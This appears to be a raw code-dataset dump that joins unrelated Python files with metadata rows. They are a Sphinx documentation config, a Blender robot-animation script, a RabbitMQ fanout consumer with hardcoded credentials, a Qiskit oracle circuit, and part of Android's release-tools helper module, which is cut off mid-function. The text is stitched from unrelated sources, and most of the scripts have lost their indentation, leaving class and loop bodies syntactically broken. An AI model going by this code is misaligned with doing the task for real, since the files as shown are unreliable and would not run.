# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0'
# The full version, including alpha/beta/rc tags.
release = '1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'HPOlibdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'HPOlib.tex', u'HPOlib Documentation',
u'Matthias Feurer, Katharina Eggensperger', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'hpolib', u'HPOlib Documentation',
[u'Matthias Feurer, Katharina Eggensperger'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'HPOlib', u'HPOlib Documentation',
u'Matthias Feurer, Katharina Eggensperger', 'HPOlib', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# -- Mock modules with C extensions according to ReadTheDocs.com
# https://docs.readthedocs.org/en/latest/faq.html?highlight=numpy
from mock import Mock as MagicMock
class Mock(MagicMock):
@classmethod
def __getattr__(cls, name):
return Mock()
MOCK_MODULES = ['argparse', 'numpy', 'pandas', 'scipy', 'numpy.distutils',
'numpy.distutils.core', 'matplotlib', 'numpy.distutils.core']
sys.modules.update((mod_name, Mock()) for mod_name in MOCK_MODULES) | [
"[email protected]"
] | |
be7e2605e2a665d952cbcf3b01736709b9ac7bc0 | af5d9d3d1596ada9e3d162d12912f03c58305de3 | /scripts/Conference2021.py | 42e26e1a6bc45d8969d39a1d4d10e0d17cb00983 | [] | no_license | Oz-Oguz/bpy-scripting | 8db40c6750aeae8740269621ad9fda754df8fb89 | 938f9eb2b76d26009af252457601db018cb428f2 | refs/heads/main | 2023-08-23T05:36:08.046618 | 2021-10-14T11:12:09 | 2021-10-14T11:14:07 | 366,370,457 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 9,303 | py | import bpy
import bmesh
import numpy as np
import sys, os
import re
import time
dirname = os.path.dirname(os.path.realpath(__file__+"/.."))
sys.path.append(dirname)
from src.Utils import *
from src.RaiAnim import *
from src.Camera import *
time_start_script = time.process_time()
########################################################
# CUSTOM SETTINGS
########################################################
Nsegments = 2 #display N segments. -1: display all segments
NkeyframeSteps = 10 #use every n-th keyframe, interpolate inbetween
# renderAnimation = True
renderAnimation = False
doZoom=True
tPaddingEnd = 250 #number of frames to append after algorithms converged
tZoomStart = 100 ##frame at which we start to zoom the camera
tZoomOutDuration = 25
tRotationStart = tZoomStart + 200
cameraLocation = Vector((-6,-12,+5))
cameraFocusPoint = Vector((0,0,0))
folder = "data/animations/20210215_141740/"
folder = "data/animations/20210216_001730/"
folder = "data/animations/20210216_204609/" ## tower, 4agents, 1crane
folder = "data/animations/20210218_214753/" ##pyramid
folder = "data/animations/Julius_well/" ## well (Julius, 2 agents)
folder = "data/animations/20210223_192210/" ##FIT building, 6 agents
folder = "data/animations/20210223_112459/" ## well (valentin, 6 agents)
folder = "data/animations/20210218_173654/" ## wall
folder = "data/animations/20210221_004210/" ## tower
folder = "data/animations/20210226_124540/" ## tower (4kuka, 4mobile)
folder = "data/animations/20210226_130645/" ## tower (4kuka, 4mobile, 1crane)
folder = "data/animations/fit/" ##final FIT (6+6 agents)
folder = "data/animations/wall/" ##final wall (6+6 agents)
folder = "data/animations/20210226_135839/" ## tower (right colors)
folder = "data/animations/handover/" ##Final Tower Handover
folder = "data/animations/all_robots/" ##Group Picture
filename = os.path.basename(os.path.dirname(folder))
if "fit" in filename:
tZoomOutDuration = 35
if "20210226_135839" in filename:
tZoomOutDuration = 40
if "handover" in filename:
doZoom=False
cameraLocation = Vector((-14,-20,+9))
tRotationStart = 0
tZoomOutDuration = 40
bpy.ops.object.select_all(action='SELECT')
bpy.ops.object.delete()
########################################################
# Load collada file and preprocess the objects
########################################################
fname = os.path.abspath(dirname+"/" + folder + "initial.dae")
A = Anim(folder + "/Anim.txt")
c = bpy.ops.wm.collada_import(filepath=fname, import_units=True, auto_connect=False)
bpy.ops.object.select_all(action='SELECT')
objs = bpy.context.selected_objects
curves = {}
for obj in objs:
if "gripper" in obj.name:
curveDynamic = addBezierCurve(obj.name)
curves[obj.name] = curveDynamic
obj.location = [0,-1000,-1000]
if obj.name == "plate":
bpy.context.scene.frame_set(0)
obj.location = [0,0,-0.15]
obj.rotation_mode = 'QUATERNION'
obj.rotation_quaternion = [1,0,0,0]
obj.parent = None
obj.keyframe_insert(data_path="location", index=-1)
obj.keyframe_insert(data_path="rotation_quaternion", index=-1)
# addMaterialConcrete(obj)
addMaterialColor(obj, (0.6,0.6,0.6,1.0))
########################################################
# Load collada file and preprocess the objects
########################################################
setBackgroundColor((.2,.2,.2))
bpy.ops.object.select_all(action='SELECT')
ctr = 0
bpy.context.scene.frame_start = 0
bpy.context.scene.frame_end = 0
for segment in A.segments:
if ctr > Nsegments and Nsegments >= 0:
break
ctr = ctr + 1
for n in range(0,len(segment.names)):
name = segment.names[n]
if segment.timeEnd > bpy.context.scene.frame_end:
bpy.context.scene.frame_end = segment.timeEnd
print("Import segment %d/%d [time %d,%d] (link %s %d/%d)"\
%(ctr,(Nsegments+1 if Nsegments>=0 else len(A.segments)),
segment.timeStart,segment.timeEnd, name, n,len(segment.names)))
for obj in bpy.context.selected_objects:
if obj.name != name:
continue
if "coll" in name:
continue
# if '_' in obj.name:
# continue
## FIXED CURVE FOR DEBUGGING
# if obj.name == name and "gripper" in obj.name:
# T = range(segment.timeStart, segment.timeEnd)
# Ng = len(T)-1
# curveObject = addBezierCurve(obj.name+"trail", Ng, 0.005)
# P = curveObject.data.splines[0].points
# for t in T:
# pose = segment.getPoses(t, obj.name)
# p = P[t-segment.timeStart]
# p.co = (pose[0], pose[1], pose[2], 1.0)
for t in range(segment.timeStart, segment.timeEnd, NkeyframeSteps):
pose = segment.getPoses(t, name)
color = segment.getColor(name)
bpy.context.scene.frame_set(t)
obj.location = pose[0:3]
obj.rotation_mode = 'QUATERNION'
obj.rotation_quaternion = pose[3:]
obj.parent = None
obj.keyframe_insert(data_path="location", index=-1)
obj.keyframe_insert(data_path="rotation_quaternion", index=-1)
for fcurve in obj.animation_data.action.fcurves:
kf = fcurve.keyframe_points[-1]
kf.interpolation = 'CONSTANT'
# pattern = re.compile(r'^(b|node)[0-9]+')
# if pattern.match(obj.name):
if '_' not in obj.name:
# print("Add glass material.")
addMaterialGlass(obj)
else:
addMaterialColor(obj, color)
if "gripper" in obj.name:
P = curves[obj.name].data.splines[0].points
addMaterialColor(curves[obj.name], color)
material = curves[obj.name].active_material
material.shadow_method = 'NONE'
curves[obj.name].cycles_visibility.shadow = False
material.use_nodes = True
bsdf = material.node_tree.nodes["Principled BSDF"]
bsdf.inputs['Base Color'].default_value = color
L = len(P)
for ctrPts in range(0, L):
tval = t - ctrPts
if tval > 0:
cPose = segment.getPoses(tval, name)
else:
cPose = segment.getPoses(0, name)
p = P[ctrPts]
#Ordering of points: left is current in time, right is back in time
p.co = (cPose[0], cPose[1], cPose[2], 1.0)
##Attempt at letting path fade out (does not work yet)
alpha = 1.0 - float(ctrPts)/float(L)
slot = curves[obj.name].material_slots[0]
slot.material.diffuse_color[3] = alpha
p.keyframe_insert(data_path="co", index=-1)
####WEIRD behavior during fadeout
if "gripper" in obj.name:
##add fadeout
tend = segment.timeEnd
P = curves[obj.name].data.splines[0].points
L = len(P)
if tend+L > bpy.context.scene.frame_end:
bpy.context.scene.frame_end = tend + L
for t in range(tend, tend + L):
bpy.context.scene.frame_set(t)
for ctrPts in range(0, L):
tval = t - ctrPts
if tval <= 0:
cPose = segment.getPoses(0, name)
elif tval < tend:
cPose = segment.getPoses(tval, name)
else:
cPose = segment.getPoses(tend-1, name)
p = P[ctrPts]
p.co = (cPose[0], cPose[1], cPose[2], 1)
p.keyframe_insert(data_path="co")
###############################################################################
## LIGHTNING
###############################################################################
lightLocation = 0.3*(cameraLocation-cameraFocusPoint)+Vector((0,0,+5))
# addLightSourceSun(lightLocation)
addLightSourcePoint(lightLocation)
###############################################################################
## CAMERA
###############################################################################
bpy.context.scene.frame_end += tPaddingEnd
tend = bpy.context.scene.frame_end
camera = Camera(cameraLocation, cameraFocusPoint)
#0:0,pick 141,place 56,retract 53;252,pick 48,place 307,retract 52;
#TODO: zoom in/out to specific distance
distance = copy.copy(camera.distance)
if doZoom:
camera.zoomIn(tZoomStart, tZoomStart+50)
camera.zoomOut(tZoomStart+50+50, tZoomStart+50+50+tZoomOutDuration)
#camera.rotate(253+10, tend)
camera.rotate(tRotationStart, tend)
# camera.zoomOut(210,400)
## set view to camera
for area in bpy.context.screen.areas:
if area.type == 'VIEW_3D':
area.spaces[0].region_3d.view_perspective = 'CAMERA'
break
###############################################################################
## RENDERING
###############################################################################
renderEngine = bpy.context.scene.render
renderEngine.image_settings.file_format = "FFMPEG"
renderEngine.ffmpeg.format = "MPEG4"
renderEngine.ffmpeg.codec = "H264"
renderEngine.ffmpeg.constant_rate_factor = "HIGH" #MEDIUM, LOW
renderEngine.filepath = dirname+"/"+filename+".mp4"
### Render Animation to MP4 video
if renderAnimation:
print("Starting to render %d frames."% bpy.context.scene.frame_end)
bpy.ops.render.render(animation=True)
elapsed_time = time.process_time() - time_start_script
print("TIME for RENDERING: %f (in s), %f (in m), %f (in h)"%\
(elapsed_time,elapsed_time/60,elapsed_time/60/60))
| [
"[email protected]"
] | |
e2e88c41fcb82cba6f6b2533f7d4532d42c84a36 | 0a7d49300a547eecc823b78a891057f1017db1b2 | /rabbitmq/fanout_rec.py | e041a3d36ed001c4e471e104b35850cdfe3400c3 | [] | no_license | PeterZhangxing/codewars | f315b2ce610207e84a2f0927bc47b4b1dd89bee4 | 8e4dfaaeae782a37f6baca4c024b1c2a1dc83cba | refs/heads/master | 2020-09-22T12:09:59.419919 | 2020-03-02T12:52:55 | 2020-03-02T12:52:55 | 224,330,565 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,028 | py | import pika
credentials = pika.PlainCredentials('zx2005', 'redhat')
# Connect to the remote queue server using the credentials defined above
connection = pika.BlockingConnection(pika.ConnectionParameters(
"10.1.1.128",
credentials=credentials
))
# Open an AMQP (RabbitMQ protocol) channel on top of the TCP connection
channel = connection.channel()
# Declare a fanout (broadcast) exchange
channel.exchange_declare(exchange='logs', exchange_type='fanout')
# Declare a queue without naming it so RabbitMQ assigns a random name;
# exclusive=True deletes the queue once this consumer disconnects
result = channel.queue_declare(exclusive=True)
queue_name = result.method.queue # get the randomly assigned queue name
# Bind the queue to the exchange so it receives the broadcast messages
channel.queue_bind(exchange='logs', queue=queue_name)
# 从自己申明的队列接收广播消息
def callback(ch, method, properties, body):
print(" [x] %r" % body)
# Start pulling messages from the declared queue
channel.basic_consume(callback, queue=queue_name,no_ack=True)
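# Illustrative companion sketch (an assumption, not part of this script):
# a matching publisher declares the same fanout exchange and publishes
# with an empty routing key, which fanout exchanges ignore anyway.
def _example_publish(message):
    pub_conn = pika.BlockingConnection(pika.ConnectionParameters(
        "10.1.1.128", credentials=credentials))
    pub_channel = pub_conn.channel()
    pub_channel.exchange_declare(exchange='logs', exchange_type='fanout')
    pub_channel.basic_publish(exchange='logs', routing_key='', body=message)
    pub_conn.close()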
channel.start_consuming() | [
"[email protected]"
] | |
67316c99dc3b31b9eb2fb8f6fffd399a5f6f62fb | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /data/p2DJ/New/program/qiskit/QC/startQiskit_QC108.py | d99f75a7d7cceec4efb22f76cc195c74e2336e37 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,104 | py | # qubit number=2
# total number=8
import cirq
import qiskit
from qiskit import IBMQ
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2,floor, sqrt, pi
import numpy as np
import networkx as nx
def build_oracle(n: int, f) -> QuantumCircuit:
# implement the oracle O_f^\pm
# NOTE: use U1 gate (P gate) with \lambda = 180 ==> CZ gate
# or multi_control_Z_gate (issue #127)
controls = QuantumRegister(n, "ofc")
target = QuantumRegister(1, "oft")
oracle = QuantumCircuit(controls, target, name="Of")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
oracle.mct(controls, target[0], None, mode='noancilla')
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
# oracle.draw('mpl', filename='circuit/deutsch-oracle.png')
return oracle
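# For example (illustrative), with n = 2 and f(rep) = rep[-1] the loop
# above adds a controlled flip of the target for the inputs "01" and "11".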
def make_circuit(n:int,f) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n, "qc")
target = QuantumRegister(1, "qt")
prog = QuantumCircuit(input_qubit, target)
# inverse last one (can be omitted if using O_f^\pm)
prog.x(target)
# apply H to get superposition
for i in range(n):
prog.h(input_qubit[i])
prog.h(input_qubit[1]) # number=1
prog.cx(input_qubit[0],input_qubit[1]) # number=2
prog.cx(input_qubit[0],input_qubit[1]) # number=5
prog.h(target)
prog.barrier()
# apply oracle O_f
oracle = build_oracle(n, f)
prog.append(
oracle.to_gate(),
[input_qubit[i] for i in range(n)] + [target])
# apply H back (QFT on Z_2^n)
for i in range(n):
prog.h(input_qubit[i])
prog.barrier()
# measure
#for i in range(n):
# prog.measure(input_qubit[i], classicals[i])
prog.x(input_qubit[0]) # number=3
prog.x(input_qubit[0]) # number=4
prog.swap(input_qubit[1],input_qubit[0]) # number=6
prog.swap(input_qubit[1],input_qubit[0]) # number=7
# circuit end
return prog
if __name__ == '__main__':
n = 2
f = lambda rep: rep[-1]
# f = lambda rep: "1" if rep[0:2] == "01" or rep[0:2] == "10" else "0"
# f = lambda rep: "0"
prog = make_circuit(n, f)
    sample_shot = 2800
IBMQ.load_account()
provider = IBMQ.get_provider(hub='ibm-q')
provider.backends()
backend = provider.get_backend("ibmq_belem")
circuit1 = transpile(prog,FakeVigo())
circuit1.x(qubit=3)
circuit1.x(qubit=3)
circuit1.measure_all()
prog = circuit1
info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
writefile = open("../data/startQiskit_QC108.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.depth(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
| [
"[email protected]"
] | |
3af0de1078602eb1f3aefb95f8e1cf7963429092 | 47b71ff8a12367c10573e58289d6abbd41c2436f | /android/build/tools/releasetools/common.py | 30ffab38faab92b96f5a6f2b019841c94567bf9c | [
"Apache-2.0"
] | permissive | BPI-SINOVOIP/BPI-A31S-Android | d567fcefb8881bcca67f9401c5a4cfa875df5640 | ed63ae00332d2fdab22efc45a4a9a46ff31b8180 | refs/heads/master | 2022-11-05T15:39:21.895636 | 2017-04-27T16:58:45 | 2017-04-27T16:58:45 | 48,844,096 | 2 | 4 | null | 2022-10-28T10:10:24 | 2015-12-31T09:34:31 | null | UTF-8 | Python | false | false | 29,923 | py | # Copyright (C) 2008 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import errno
import getopt
import getpass
import imp
import os
import platform
import re
import shlex
import shutil
import subprocess
import sys
import tempfile
import threading
import time
import zipfile
try:
from hashlib import sha1 as sha1
except ImportError:
from sha import sha as sha1
# missing in Python 2.4 and before
if not hasattr(os, "SEEK_SET"):
os.SEEK_SET = 0
class Options(object): pass
OPTIONS = Options()
OPTIONS.search_path = "out/host/linux-x86"
OPTIONS.signapk_path = "framework/signapk.jar" # Relative to search_path
OPTIONS.extra_signapk_args = []
OPTIONS.java_path = "java" # Use the one on the path by default.
OPTIONS.public_key_suffix = ".x509.pem"
OPTIONS.private_key_suffix = ".pk8"
OPTIONS.verbose = False
OPTIONS.tempfiles = []
OPTIONS.device_specific = None
OPTIONS.extras = {}
OPTIONS.info_dict = None
# Values for "certificate" in apkcerts that mean special things.
SPECIAL_CERT_STRINGS = ("PRESIGNED", "EXTERNAL")
class ExternalError(RuntimeError): pass
def Run(args, **kwargs):
"""Create and return a subprocess.Popen object, printing the command
line on the terminal if -v was specified."""
if OPTIONS.verbose:
print " running: ", " ".join(args)
return subprocess.Popen(args, **kwargs)
def CloseInheritedPipes():
""" Gmake in MAC OS has file descriptor (PIPE) leak. We close those fds
before doing other work."""
if platform.system() != "Darwin":
return
for d in range(3, 1025):
try:
stat = os.fstat(d)
if stat is not None:
pipebit = stat[0] & 0x1000
if pipebit != 0:
os.close(d)
except OSError:
pass
def LoadInfoDict(zip):
"""Read and parse the META/misc_info.txt key/value pairs from the
input target files and return a dict."""
d = {}
try:
for line in zip.read("META/misc_info.txt").split("\n"):
line = line.strip()
if not line or line.startswith("#"): continue
k, v = line.split("=", 1)
d[k] = v
except KeyError:
# ok if misc_info.txt doesn't exist
pass
# backwards compatibility: These values used to be in their own
# files. Look for them, in case we're processing an old
# target_files zip.
if "mkyaffs2_extra_flags" not in d:
try:
d["mkyaffs2_extra_flags"] = zip.read("META/mkyaffs2-extra-flags.txt").strip()
except KeyError:
# ok if flags don't exist
pass
if "recovery_api_version" not in d:
try:
d["recovery_api_version"] = zip.read("META/recovery-api-version.txt").strip()
except KeyError:
raise ValueError("can't find recovery API version in input target-files")
if "tool_extensions" not in d:
try:
d["tool_extensions"] = zip.read("META/tool-extensions.txt").strip()
except KeyError:
# ok if extensions don't exist
pass
if "fstab_version" not in d:
d["fstab_version"] = "1"
try:
data = zip.read("META/imagesizes.txt")
for line in data.split("\n"):
if not line: continue
name, value = line.split(" ", 1)
if not value: continue
if name == "blocksize":
d[name] = value
else:
d[name + "_size"] = value
except KeyError:
pass
def makeint(key):
if key in d:
d[key] = int(d[key], 0)
makeint("recovery_api_version")
makeint("blocksize")
makeint("system_size")
makeint("userdata_size")
makeint("cache_size")
makeint("recovery_size")
makeint("boot_size")
makeint("fstab_version")
d["fstab"] = LoadRecoveryFSTab(zip, d["fstab_version"])
d["build.prop"] = LoadBuildProp(zip)
return d
def LoadBuildProp(zip):
try:
data = zip.read("SYSTEM/build.prop")
except KeyError:
print "Warning: could not find SYSTEM/build.prop in %s" % zip
data = ""
d = {}
for line in data.split("\n"):
line = line.strip()
if not line or line.startswith("#"): continue
name, value = line.split("=", 1)
d[name] = value
return d
def LoadRecoveryFSTab(zip, fstab_version):
class Partition(object):
pass
try:
data = zip.read("RECOVERY/RAMDISK/etc/recovery.fstab")
except KeyError:
print "Warning: could not find RECOVERY/RAMDISK/etc/recovery.fstab in %s." % zip
data = ""
if fstab_version == 1:
d = {}
for line in data.split("\n"):
line = line.strip()
if not line or line.startswith("#"): continue
pieces = line.split()
if not (3 <= len(pieces) <= 4):
raise ValueError("malformed recovery.fstab line: \"%s\"" % (line,))
p = Partition()
p.mount_point = pieces[0]
p.fs_type = pieces[1]
p.device = pieces[2]
p.length = 0
options = None
if len(pieces) >= 4:
if pieces[3].startswith("/"):
p.device2 = pieces[3]
if len(pieces) >= 5:
options = pieces[4]
else:
p.device2 = None
options = pieces[3]
else:
p.device2 = None
if options:
options = options.split(",")
for i in options:
if i.startswith("length="):
p.length = int(i[7:])
else:
print "%s: unknown option \"%s\"" % (p.mount_point, i)
d[p.mount_point] = p
elif fstab_version == 2:
d = {}
for line in data.split("\n"):
line = line.strip()
if not line or line.startswith("#"): continue
pieces = line.split()
if len(pieces) != 5:
raise ValueError("malformed recovery.fstab line: \"%s\"" % (line,))
# Ignore entries that are managed by vold
options = pieces[4]
if "voldmanaged=" in options: continue
# It's a good line, parse it
p = Partition()
p.device = pieces[0]
p.mount_point = pieces[1]
p.fs_type = pieces[2]
p.device2 = None
p.length = 0
options = options.split(",")
for i in options:
if i.startswith("length="):
p.length = int(i[7:])
else:
# Ignore all unknown options in the unified fstab
continue
d[p.mount_point] = p
else:
raise ValueError("Unknown fstab_version: \"%d\"" % (fstab_version,))
return d
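
# Illustrative fstab lines matching the two parsers above (the paths are
# assumptions, not from a real device):
#   v1:  /system  ext4  /dev/block/by-name/system  length=-16384
#   v2:  /dev/block/by-name/userdata  /data  ext4  noatime  wait,length=-16384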
def DumpInfoDict(d):
for k, v in sorted(d.items()):
print "%-25s = (%s) %s" % (k, type(v).__name__, v)
def BuildBootableImage(sourcedir, fs_config_file, info_dict=None):
"""Take a kernel, cmdline, and ramdisk directory from the input (in
'sourcedir'), and turn them into a boot image. Return the image
  data, or None if sourcedir does not appear to contain files for
building the requested image."""
if (not os.access(os.path.join(sourcedir, "RAMDISK"), os.F_OK) or
not os.access(os.path.join(sourcedir, "kernel"), os.F_OK)):
return None
if info_dict is None:
info_dict = OPTIONS.info_dict
ramdisk_img = tempfile.NamedTemporaryFile()
img = tempfile.NamedTemporaryFile()
if os.access(fs_config_file, os.F_OK):
cmd = ["mkbootfs", "-f", fs_config_file, os.path.join(sourcedir, "RAMDISK")]
else:
cmd = ["mkbootfs", os.path.join(sourcedir, "RAMDISK")]
p1 = Run(cmd, stdout=subprocess.PIPE)
p2 = Run(["minigzip"],
stdin=p1.stdout, stdout=ramdisk_img.file.fileno())
p2.wait()
p1.wait()
  assert p1.returncode == 0, "mkbootfs of %s ramdisk failed" % (
      os.path.basename(sourcedir),)
  assert p2.returncode == 0, "minigzip of %s ramdisk failed" % (
      os.path.basename(sourcedir),)
cmd = ["mkbootimg", "--kernel", os.path.join(sourcedir, "kernel")]
fn = os.path.join(sourcedir, "cmdline")
if os.access(fn, os.F_OK):
cmd.append("--cmdline")
cmd.append(open(fn).read().rstrip("\n"))
fn = os.path.join(sourcedir, "base")
if os.access(fn, os.F_OK):
cmd.append("--base")
cmd.append(open(fn).read().rstrip("\n"))
fn = os.path.join(sourcedir, "pagesize")
if os.access(fn, os.F_OK):
cmd.append("--pagesize")
cmd.append(open(fn).read().rstrip("\n"))
args = info_dict.get("mkbootimg_args", None)
if args and args.strip():
cmd.extend(args.split())
cmd.extend(["--ramdisk", ramdisk_img.name,
"--output", img.name])
p = Run(cmd, stdout=subprocess.PIPE)
p.communicate()
assert p.returncode == 0, "mkbootimg of %s image failed" % (
os.path.basename(sourcedir),)
img.seek(os.SEEK_SET, 0)
data = img.read()
ramdisk_img.close()
img.close()
return data
def GetBootableImage(name, prebuilt_name, unpack_dir, tree_subdir,
info_dict=None):
"""Return a File object (with name 'name') with the desired bootable
image. Look for it in 'unpack_dir'/BOOTABLE_IMAGES under the name
'prebuilt_name', otherwise construct it from the source files in
'unpack_dir'/'tree_subdir'."""
prebuilt_path = os.path.join(unpack_dir, "BOOTABLE_IMAGES", prebuilt_name)
if os.path.exists(prebuilt_path):
print "using prebuilt %s..." % (prebuilt_name,)
return File.FromLocalFile(name, prebuilt_path)
else:
print "building image from target_files %s..." % (tree_subdir,)
fs_config = "META/" + tree_subdir.lower() + "_filesystem_config.txt"
return File(name, BuildBootableImage(os.path.join(unpack_dir, tree_subdir),
os.path.join(unpack_dir, fs_config),
info_dict))
def UnzipTemp(filename, pattern=None):
"""Unzip the given archive into a temporary directory and return the name.
If filename is of the form "foo.zip+bar.zip", unzip foo.zip into a
temp dir, then unzip bar.zip into that_dir/BOOTABLE_IMAGES.
Returns (tempdir, zipobj) where zipobj is a zipfile.ZipFile (of the
main file), open for reading.
"""
tmp = tempfile.mkdtemp(prefix="targetfiles-")
OPTIONS.tempfiles.append(tmp)
def unzip_to_dir(filename, dirname):
cmd = ["unzip", "-o", "-q", filename, "-d", dirname]
if pattern is not None:
cmd.append(pattern)
p = Run(cmd, stdout=subprocess.PIPE)
p.communicate()
if p.returncode != 0:
raise ExternalError("failed to unzip input target-files \"%s\"" %
(filename,))
m = re.match(r"^(.*[.]zip)\+(.*[.]zip)$", filename, re.IGNORECASE)
if m:
unzip_to_dir(m.group(1), tmp)
unzip_to_dir(m.group(2), os.path.join(tmp, "BOOTABLE_IMAGES"))
filename = m.group(1)
else:
unzip_to_dir(filename, tmp)
return tmp, zipfile.ZipFile(filename, "r")
def GetKeyPasswords(keylist):
"""Given a list of keys, prompt the user to enter passwords for
those which require them. Return a {key: password} dict. password
will be None if the key has no password."""
no_passwords = []
need_passwords = []
key_passwords = {}
devnull = open("/dev/null", "w+b")
for k in sorted(keylist):
# We don't need a password for things that aren't really keys.
if k in SPECIAL_CERT_STRINGS:
no_passwords.append(k)
continue
p = Run(["openssl", "pkcs8", "-in", k+OPTIONS.private_key_suffix,
"-inform", "DER", "-nocrypt"],
stdin=devnull.fileno(),
stdout=devnull.fileno(),
stderr=subprocess.STDOUT)
p.communicate()
if p.returncode == 0:
# Definitely an unencrypted key.
no_passwords.append(k)
else:
p = Run(["openssl", "pkcs8", "-in", k+OPTIONS.private_key_suffix,
"-inform", "DER", "-passin", "pass:"],
stdin=devnull.fileno(),
stdout=devnull.fileno(),
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
if p.returncode == 0:
# Encrypted key with empty string as password.
key_passwords[k] = ''
elif stderr.startswith('Error decrypting key'):
# Definitely encrypted key.
# It would have said "Error reading key" if it didn't parse correctly.
need_passwords.append(k)
else:
# Potentially, a type of key that openssl doesn't understand.
# We'll let the routines in signapk.jar handle it.
no_passwords.append(k)
devnull.close()
key_passwords.update(PasswordManager().GetPasswords(need_passwords))
